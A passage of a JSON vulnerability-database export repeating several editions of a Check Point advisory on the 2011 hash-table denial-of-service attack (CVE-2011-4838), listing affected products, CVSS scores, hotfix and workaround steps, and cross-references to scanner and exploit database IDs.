Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-24T15:10:30", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4838", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-3414", "CVE-2011-4885", "CVE-2011-4838"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2013-033", "CPAI-2012-001"]}, {"type": "seebug", "idList": ["SSV:72454", "SSV:26126", "SSV:26122", "SSV:30001", "SSV:26121"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:881167", "OPENVAS:1361412562310870638", "OPENVAS:870638", "OPENVAS:863742", "OPENVAS:1361412562310863921", "OPENVAS:71568", "OPENVAS:863706", "OPENVAS:1361412562310863681", "OPENVAS:881075", "OPENVAS:863681", "OPENVAS:1361412562310122001", "OPENVAS:863921", "OPENVAS:881142", "OPENVAS:870542", "OPENVAS:1361412562310863824", "OPENVAS:70754", "OPENVAS:1361412562310831554", "OPENVAS:136141256231070754", "OPENVAS:831554", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310120218", "OPENVAS:136141256231071568", "OPENVAS:864015", "OPENVAS:1361412562310881167"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "DEBIAN_DLA-209.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "REDHAT-RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2011-17551.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "FEDORA_2012-0504.NASL", "CENTOS_RHSA-2012-0070.NASL", "FEDORA_2012-1301.NASL", "REDHAT-RHSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FEDORA_2012-0420.NASL", "F5_BIGIP_SOL13588.NASL", "CENTOS_RHSA-2012-0069.NASL", "SOLARIS11_RUBY_20120417.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17542.NASL", "ALA_ALAS-2012-35.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069", "CESA-2012:0019"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:7706F20CE7", "FEDORA:A38F421375", "FEDORA:BFF2C21133", "FEDORA:994FA20B8F", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-24T15:10:30", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-24T15:10:30", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-24T15:10:30", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-24T23:14:29", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4885", "CVE-2011-4838", "CVE-2011-4815"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26122", "SSV:72454", "SSV:30001", "SSV:26126", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:70754", "OPENVAS:881167", "OPENVAS:863921", "OPENVAS:881142", "OPENVAS:870638", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310881119", "OPENVAS:71568", "OPENVAS:870529", "OPENVAS:870539", "OPENVAS:1361412562310881226", "OPENVAS:136141256231071568", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310870529", "OPENVAS:1361412562310870638", "OPENVAS:136141256231070754", "OPENVAS:831554", "OPENVAS:863681", "OPENVAS:1361412562310863681", "OPENVAS:863735", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863921", "OPENVAS:864015", "OPENVAS:1361412562310122001", "OPENVAS:881075"]}, {"type": "nessus", "idList": ["ASP_NET_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "F5_BIGIP_SOL13588.NASL", "FEDORA_2012-0420.NASL", "ORACLELINUX_ELSA-2012-0019.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "CENTOS_RHSA-2012-0069.NASL", "ALA_ALAS-2012-35.NASL", "CENTOS_RHSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "REDHAT-RHSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2011-17542.NASL", "FEDORA_2011-17551.NASL", "REDHAT-RHSA-2012-0069.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "DEBIAN_DLA-209.NASL", "CENTOS_RHSA-2012-0019.NASL", "SOLARIS11_RUBY_20120417.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "SL_20120130_RUBY_ON_SL4_X.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:7706F20CE7", "FEDORA:6D8EE20EB6", "FEDORA:4930D21410"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-24T23:14:29", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-24T23:14:29", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-24T23:14:29", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-25T11:15:54", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4885", "CVE-2011-4838", "CVE-2011-4815"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26122", "SSV:72454", "SSV:30001", "SSV:26126", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:70754", "OPENVAS:881167", "OPENVAS:863921", "OPENVAS:881142", "OPENVAS:870638", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310881119", "OPENVAS:71568", "OPENVAS:870529", "OPENVAS:870539", "OPENVAS:1361412562310881226", "OPENVAS:136141256231071568", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310870529", "OPENVAS:1361412562310870638", "OPENVAS:136141256231070754", "OPENVAS:831554", "OPENVAS:863681", "OPENVAS:1361412562310863681", "OPENVAS:863735", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863921", "OPENVAS:864015", "OPENVAS:1361412562310122001", "OPENVAS:881075"]}, {"type": "nessus", "idList": ["ASP_NET_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "F5_BIGIP_SOL13588.NASL", "FEDORA_2012-0420.NASL", "ORACLELINUX_ELSA-2012-0019.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "CENTOS_RHSA-2012-0069.NASL", "ALA_ALAS-2012-35.NASL", "CENTOS_RHSA-2012-0070.NASL", "GENTOO_GLSA-201207-06.NASL", "REDHAT-RHSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2011-17542.NASL", "FEDORA_2011-17551.NASL", "REDHAT-RHSA-2012-0069.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "DEBIAN_DLA-209.NASL", "CENTOS_RHSA-2012-0019.NASL", "SOLARIS11_RUBY_20120417.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "SL_20120130_RUBY_ON_SL4_X.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:7706F20CE7", "FEDORA:6D8EE20EB6", "FEDORA:4930D21410"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-24T23:14:29", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-24T23:14:29", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-25T11:15:54", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-25T15:18:11", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-3414", "CVE-2011-4838", "CVE-2011-4885"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2014-1022", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26122", "SSV:26121", "SSV:72454", "SSV:30001"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:863706", "OPENVAS:1361412562310863963", "OPENVAS:863713", "OPENVAS:136141256231070754", "OPENVAS:1361412562310831554", "OPENVAS:70754", "OPENVAS:863735", "OPENVAS:1361412562310122001", "OPENVAS:870638", "OPENVAS:870539", "OPENVAS:1361412562310881167", "OPENVAS:870529", "OPENVAS:1361412562310863921", "OPENVAS:136141256231071568", "OPENVAS:863921", "OPENVAS:881226", "OPENVAS:863712", "OPENVAS:1361412562310122002", "OPENVAS:831554", "OPENVAS:881075", "OPENVAS:863681", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310881095", "OPENVAS:71568", "OPENVAS:881167", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310120218"]}, {"type": "nessus", "idList": ["FEDORA_2012-0420.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17542.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "CENTOS_RHSA-2012-0069.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "CENTOS_RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0070.NASL", 